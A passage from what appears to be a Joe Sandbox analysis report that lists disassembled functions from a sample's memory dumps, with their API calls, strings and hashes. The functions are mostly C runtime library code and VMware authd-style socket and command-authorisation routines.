                                                    • Instruction ID: bc50bd3e30c644df3e22ca1fc253361eab5d138ac0452dd0469497173ce76e1f
                                                    • Opcode Fuzzy Hash: 29e3c4f8bb57d708be2beaca962707b503985b7cf66314260ecb5be5c6d30115
                                                    • Instruction Fuzzy Hash: C001B530D022086AC700BBA5DC8399E7BF8DF10300B00206BB914B7393DB741A478796
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF80DB2 Relevance: 19.8, APIs: 13, Instructions: 305COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • DName::operator+.LIBCMT ref: 6CF80E1D
                                                    • DName::operator+.LIBCMT ref: 6CF80F60
                                                      • Part of subcall function 6CF7CA50: shared_ptr.LIBCMT ref: 6CF7CA6C
                                                    • DName::operator+.LIBCMT ref: 6CF80FAC
                                                    • DName::operator+.LIBCMT ref: 6CF80FBB
                                                    • DName::operator+.LIBCMT ref: 6CF80F0B
                                                      • Part of subcall function 6CF8262E: DName::operator=.LIBVCRUNTIME ref: 6CF826BD
                                                    • DName::operator+.LIBCMT ref: 6CF810E7
                                                    • DName::operator=.LIBVCRUNTIME ref: 6CF81127
                                                    • DName::DName.LIBVCRUNTIME ref: 6CF8113F
                                                    • DName::operator+.LIBCMT ref: 6CF8114E
                                                    • DName::operator+.LIBCMT ref: 6CF8115A
                                                      • Part of subcall function 6CF8262E: Replicator::operator[].LIBCMT ref: 6CF8266B
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+$Name::operator=$NameName::Replicator::operator[]shared_ptr
                                                    • String ID:
                                                    • API String ID: 1026175760-0
                                                    • Opcode ID: aa8a58d7c3cc54346c894761dc95bf9c1de6fadb32f106f797cd6e300298d80d
                                                    • Instruction ID: 633e7194def5c057e1d86f1d0a93ee67fe03e5616240169ac26b636a8336496e
                                                    • Opcode Fuzzy Hash: aa8a58d7c3cc54346c894761dc95bf9c1de6fadb32f106f797cd6e300298d80d
                                                    • Instruction Fuzzy Hash: AFC1C572E02248DFDB10CFA4D855BEEBBF8EB09308F10855EE159A7680EB71A549CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF94AD8 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • ___free_lconv_mon.LIBCMT ref: 6CF94B1C
                                                      • Part of subcall function 6CF95267: _free.LIBCMT ref: 6CF95284
                                                      • Part of subcall function 6CF95267: _free.LIBCMT ref: 6CF95296
                                                      • Part of subcall function 6CF95267: _free.LIBCMT ref: 6CF952A8
                                                      • Part of subcall function 6CF95267: _free.LIBCMT ref: 6CF952BA
                                                      • Part of subcall function 6CF95267: _free.LIBCMT ref: 6CF952CC
                                                      • Part of subcall function 6CF95267: _free.LIBCMT ref: 6CF952DE
                                                      • Part of subcall function 6CF95267: _free.LIBCMT ref: 6CF952F0
                                                      • Part of subcall function 6CF95267: _free.LIBCMT ref: 6CF95302
                                                      • Part of subcall function 6CF95267: _free.LIBCMT ref: 6CF95314
                                                      • Part of subcall function 6CF95267: _free.LIBCMT ref: 6CF95326
                                                      • Part of subcall function 6CF95267: _free.LIBCMT ref: 6CF95338
                                                      • Part of subcall function 6CF95267: _free.LIBCMT ref: 6CF9534A
                                                      • Part of subcall function 6CF95267: _free.LIBCMT ref: 6CF9535C
                                                    • _free.LIBCMT ref: 6CF94B11
                                                      • Part of subcall function 6CF8ACB9: HeapFree.KERNEL32(00000000,00000000,?,6CF899DC), ref: 6CF8ACCF
                                                      • Part of subcall function 6CF8ACB9: GetLastError.KERNEL32(?,?,6CF899DC), ref: 6CF8ACE1
                                                    • _free.LIBCMT ref: 6CF94B33
                                                    • _free.LIBCMT ref: 6CF94B48
                                                    • _free.LIBCMT ref: 6CF94B53
                                                    • _free.LIBCMT ref: 6CF94B75
                                                    • _free.LIBCMT ref: 6CF94B88
                                                    • _free.LIBCMT ref: 6CF94B96
                                                    • _free.LIBCMT ref: 6CF94BA1
                                                    • _free.LIBCMT ref: 6CF94BD9
                                                    • _free.LIBCMT ref: 6CF94BE0
                                                    • _free.LIBCMT ref: 6CF94BFD
                                                    • _free.LIBCMT ref: 6CF94C15
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                    • String ID:
                                                    • API String ID: 161543041-0
                                                    • Opcode ID: 14f9b37c24d219153ca044890d50a113391d5eab5ec5c01e4fc5d00f27fc47eb
                                                    • Instruction ID: 263369027750a9602024c7a7903348f6983947365e0545d8d50b549fb97fe8f2
                                                    • Opcode Fuzzy Hash: 14f9b37c24d219153ca044890d50a113391d5eab5ec5c01e4fc5d00f27fc47eb
                                                    • Instruction Fuzzy Hash: 01316D32605600DFFF518F39D940B86BBF8EF52718F20551AE479D7A90DB32E8458B20
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED1730 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Warning.VMWAREBASE(Received GLOBAL command: %s,?), ref: 00ED173E
                                                      • Part of subcall function 00ED3B70: Warning.VMWAREBASE(?,00000400,?,?), ref: 00ED3B96
                                                    Strings
                                                    • vmware-hostd, xrefs: 00ED17E5
                                                    • failed., xrefs: 00ED17F8
                                                    • Received GLOBAL command: %s, xrefs: 00ED1739
                                                    • hostd connection to %s%s, xrefs: 00ED1804
                                                    • User not authorized for host agent contact, xrefs: 00ED17BB
                                                    • Command '%s%s' not authorized for hostd contact, xrefs: 00ED1778
                                                    • Global command %s%s to non-host agent targets not supported, xrefs: 00ED17AE
                                                    • Invalid arguments to '%s', xrefs: 00ED174E
                                                    • ha-nfc, xrefs: 00ED1797
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning
                                                    • String ID: failed.$Command '%s%s' not authorized for hostd contact$Global command %s%s to non-host agent targets not supported$Invalid arguments to '%s'$Received GLOBAL command: %s$User not authorized for host agent contact$ha-nfc$hostd connection to %s%s$vmware-hostd
                                                    • API String ID: 2415109466-3597576495
                                                    • Opcode ID: 960d192b5fa59341fe263f267a33a7f52c10bc9f5caf76b456112cebb4987821
                                                    • Instruction ID: 8c454502f5b377537aa35fadeedd44a2be319a177cbf97ca8fddbc6dc4ad150a
                                                    • Opcode Fuzzy Hash: 960d192b5fa59341fe263f267a33a7f52c10bc9f5caf76b456112cebb4987821
                                                    • Instruction Fuzzy Hash: 9521E73278034037E7301659EC07F977799CB92B6AF082077FB08797D1D1915A5392D6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF8EB7D Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3907804496
                                                    • Opcode ID: 5264fc33b70e6cf56b5b8166d16e30800dc3cd9764c95f03541c6f74b34dd864
                                                    • Instruction ID: 9b5445fa6a955be24543a15ed658aea7f20382ae7f1bcb0e96985d6ba61ed7d5
                                                    • Opcode Fuzzy Hash: 5264fc33b70e6cf56b5b8166d16e30800dc3cd9764c95f03541c6f74b34dd864
                                                    • Instruction Fuzzy Hash: EDC12879E062059FDF01CFA8C884BEDBBB0BF4A318F104159E850ABB91C770D945CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF99AFB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 6CF997B4: CreateFileW.KERNEL32(00000000,00000000,?,6CF99BA4,?,?,00000000,?,6CF99BA4,00000000,0000000C), ref: 6CF997D1
                                                    • GetLastError.KERNEL32 ref: 6CF99C0F
                                                    • __dosmaperr.LIBCMT ref: 6CF99C16
                                                    • GetFileType.KERNEL32(00000000), ref: 6CF99C22
                                                    • GetLastError.KERNEL32 ref: 6CF99C2C
                                                    • __dosmaperr.LIBCMT ref: 6CF99C35
                                                    • CloseHandle.KERNEL32(00000000), ref: 6CF99C55
                                                    • CloseHandle.KERNEL32(6CF91DE0), ref: 6CF99DA2
                                                    • GetLastError.KERNEL32 ref: 6CF99DD4
                                                    • __dosmaperr.LIBCMT ref: 6CF99DDB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                    • String ID: H
                                                    • API String ID: 4237864984-2852464175
                                                    • Opcode ID: ea6a635f50f475b38d9ed55b61f75984074d3b6a6f364f82b1735b6c979a8401
                                                    • Instruction ID: 3fc251e7474bf99c75d8280829d1586b7ce9d8f74d6b28bf4e9a2cc8620a0e91
                                                    • Opcode Fuzzy Hash: ea6a635f50f475b38d9ed55b61f75984074d3b6a6f364f82b1735b6c979a8401
                                                    • Instruction Fuzzy Hash: 41A11432A141458FEF19DF68CC91BAE3BB1AF07328F19025DE815AF390CB359A16CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF58C50 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 190COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6CF58C86
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6CF58CA8
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6CF58CC8
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6CF58CEF
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6CF58D68
                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6CF58DB4
                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6CF58DCE
                                                      • Part of subcall function 6CF82FF3: _free.LIBCMT ref: 6CF83006
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6CF58E63
                                                    • std::_Facet_Register.LIBCPMT ref: 6CF58E70
                                                      • Part of subcall function 6CF766EC: std::invalid_argument::invalid_argument.LIBCONCRT ref: 6CF766F8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister_freestd::invalid_argument::invalid_argument
                                                    • String ID: bad locale name
                                                    • API String ID: 1536214518-1405518554
                                                    • Opcode ID: 2fd867fbc9dd836ce0efd87a7cf5ef30d8ae4551c617baa79fa7c8768dc7ffd4
                                                    • Instruction ID: 2a67f16aaa38087010ae59812eef3af06733cfd4d69f5c185970e2b0ecb53887
                                                    • Opcode Fuzzy Hash: 2fd867fbc9dd836ce0efd87a7cf5ef30d8ae4551c617baa79fa7c8768dc7ffd4
                                                    • Instruction Fuzzy Hash: 08619CB1E11249DBEB10CFA8D944BDEBBB4BF14308F14041AE915AB740EB74E909CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED2B60 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 127COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Warning.VMWAREBASE(?,?,vmware-vmx-stats.exe,00000000,?,vmware-vmx-stats.exe), ref: 00ED2B6F
                                                    • Warning.VMWAREBASE(00000000,00EDB1EC,?,?,vmware-vmx-stats.exe,00000000,?,vmware-vmx-stats.exe), ref: 00ED2B7C
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00EDB1EC,?,?,vmware-vmx-stats.exe,00000000,?,vmware-vmx-stats.exe), ref: 00ED2B84
                                                    • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000208,00000000,00000000), ref: 00ED2BB6
                                                    • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 00ED2BFA
                                                    • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000208,00000000), ref: 00ED2C0E
                                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00ED2C1C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warningfgets$_strnicmpfclosefree
                                                    • String ID: vmware-vmx-stats.exe
                                                    • API String ID: 1422050075-4079124726
                                                    • Opcode ID: 61f00a217a1742d47c97939563e84b5fd60f2c9820728bb334455f0b27083528
                                                    • Instruction ID: 67f5d9400b9027b403b211c6efa7fa1bcf36626d00567ace4cf62d22de7864aa
                                                    • Opcode Fuzzy Hash: 61f00a217a1742d47c97939563e84b5fd60f2c9820728bb334455f0b27083528
                                                    • Instruction Fuzzy Hash: 1241F8719002086FDB119BA5AC45BAEBBACDF55318F0410ABFE04F3342E6369E5A8791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED5B00 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 91pipenetworkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WaitForMultipleObjectsEx.KERNEL32(?,?,00000000,000000FF,00000001), ref: 00ED5B12
                                                    • accept.WS2_32(?,00000000,00000000), ref: 00ED5B2E
                                                    • accept.WS2_32(?,00000000,00000000), ref: 00ED5B4D
                                                    • GetLastError.KERNEL32 ref: 00ED5B65
                                                    • ConnectNamedPipe.KERNEL32(?,00000000), ref: 00ED5BA6
                                                    • GetLastError.KERNEL32 ref: 00ED5BB4
                                                    • FlushFileBuffers.KERNEL32(?), ref: 00ED5BD3
                                                    • DisconnectNamedPipe.KERNEL32(?), ref: 00ED5BE9
                                                    • ConnectNamedPipe.KERNEL32(?,00000000), ref: 00ED5C15
                                                    Strings
                                                    • Accept on local socket failed (%d)., xrefs: 00ED5B6C
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: NamedPipe$ConnectErrorLastaccept$BuffersDisconnectFileFlushMultipleObjectsWait
                                                    • String ID: Accept on local socket failed (%d).
                                                    • API String ID: 3041817889-797927945
                                                    • Opcode ID: 645281f8afc36a6f494d2a63a27dcf14eb2665721b66261632b0d1361002ddee
                                                    • Instruction ID: ccbe1e93c4781223834eae47ee351abab835b6b473e6c1eadd191f5a19bc0901
                                                    • Opcode Fuzzy Hash: 645281f8afc36a6f494d2a63a27dcf14eb2665721b66261632b0d1361002ddee
                                                    • Instruction Fuzzy Hash: DA31ABB2000F00AFE7301F25EC09B47BBA5EB05319F241A2BF55AB56E0D372E54ACB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF7DFA8 Relevance: 16.9, APIs: 11, Instructions: 362COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: shared_ptr$operator+$Name::operator+Name::operator=
                                                    • String ID:
                                                    • API String ID: 1464150960-0
                                                    • Opcode ID: 8f787884fb516182201ccf97969d75fa7e818dc969a9b027a9fa786318816ba6
                                                    • Instruction ID: b60e75d54fd38855cf8bcbf61e2b5e46be13c99334f9d333d0969b7d768fc99a
                                                    • Opcode Fuzzy Hash: 8f787884fb516182201ccf97969d75fa7e818dc969a9b027a9fa786318816ba6
                                                    • Instruction Fuzzy Hash: 84E13BB6D0520ADFCB24CF94E485BEFBBB4AB05304F20815BD521ABA50D774964ACFE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED1830 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Warning.VMWAREBASE(received CONNECT_VPXA command: %s,?), ref: 00ED183E
                                                      • Part of subcall function 00ED3B70: Warning.VMWAREBASE(?,00000400,?,?), ref: 00ED3B96
                                                    Strings
                                                    • received CONNECT_VPXA command: %s, xrefs: 00ED1839
                                                    • Global command %s%s to non-vpxa targets not supported, xrefs: 00ED18AE
                                                    • vmware-vpxa, xrefs: 00ED18E5
                                                    • User not authorized for vpx agent contact, xrefs: 00ED18BB
                                                    • Command '%s%s' not authorized for vpxa contact, xrefs: 00ED1878
                                                    • vpxa-nfc, xrefs: 00ED1897
                                                    • Invalid arguments to '%s', xrefs: 00ED184E
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning
                                                    • String ID: Command '%s%s' not authorized for vpxa contact$Global command %s%s to non-vpxa targets not supported$Invalid arguments to '%s'$User not authorized for vpx agent contact$received CONNECT_VPXA command: %s$vmware-vpxa$vpxa-nfc
                                                    • API String ID: 2415109466-3576414198
                                                    • Opcode ID: ab68032f0bab094189ac248ea9cc3be4c3873bb762042c69435d3c686227ee03
                                                    • Instruction ID: 251caeb99b496c5a1975f2f62a2848f985094aa11c7a8570f634579484bf05d5
                                                    • Opcode Fuzzy Hash: ab68032f0bab094189ac248ea9cc3be4c3873bb762042c69435d3c686227ee03
                                                    • Instruction Fuzzy Hash: 1411E73678030476EB202699BC07FD67B49DB51B6AF082073FB0C793C2D29156A293E6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED32A0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 65networkthreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,00ED2119,?,?,00000006,start,security.host.ruissl,?,?,00000000,00000118), ref: 00ED32CF
                                                    • GetLastError.KERNEL32(?,00ED2119,?,?,00000006,start,security.host.ruissl,?,?,00000000,00000118,00000000,?,vmware-vmx-stats.exe), ref: 00ED32DC
                                                      • Part of subcall function 00ED27C0: GetLastError.KERNEL32(?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27D8
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27F3
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00EDA850,?,?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED2807
                                                      • Part of subcall function 00ED27C0: _printf.MSPDB140-MSVCRT ref: 00ED2824
                                                      • Part of subcall function 00ED27C0: SetLastError.KERNEL32(00000000,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED282D
                                                    • WSAEventSelect.WS2_32(?,00000000,00000023), ref: 00ED32FF
                                                    • CloseHandle.KERNEL32(?,?,00ED2119,?,?,00000006,start,security.host.ruissl,?,?,00000000,00000118,00000000,?,vmware-vmx-stats.exe), ref: 00ED330D
                                                    • GetCurrentThreadId.KERNEL32 ref: 00ED331A
                                                    • WSAGetLastError.WS2_32(00000000,?,00ED2119,?,?,00000006,start,security.host.ruissl,?,?,00000000,00000118,00000000,?,vmware-vmx-stats.exe), ref: 00ED3321
                                                    Strings
                                                    • Call to CreateEvent failed with error %d., xrefs: 00ED32E3
                                                    • WSAEventSelect failed on socket %d with error %d, tid %d., xrefs: 00ED332B
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$EventWarning$CloseCreateCurrentHandleSelectThread_printf
                                                    • String ID: Call to CreateEvent failed with error %d.$WSAEventSelect failed on socket %d with error %d, tid %d.
                                                    • API String ID: 2101947036-4176423585
                                                    • Opcode ID: 587cb102979dfe03913bb8916cca1b81f968d22b1121061069120eeeef317ac0
                                                    • Instruction ID: ccfb11962f8603d9bb83b9fe8d154aafe508b62d51feca49a8d45eab6c811516
                                                    • Opcode Fuzzy Hash: 587cb102979dfe03913bb8916cca1b81f968d22b1121061069120eeeef317ac0
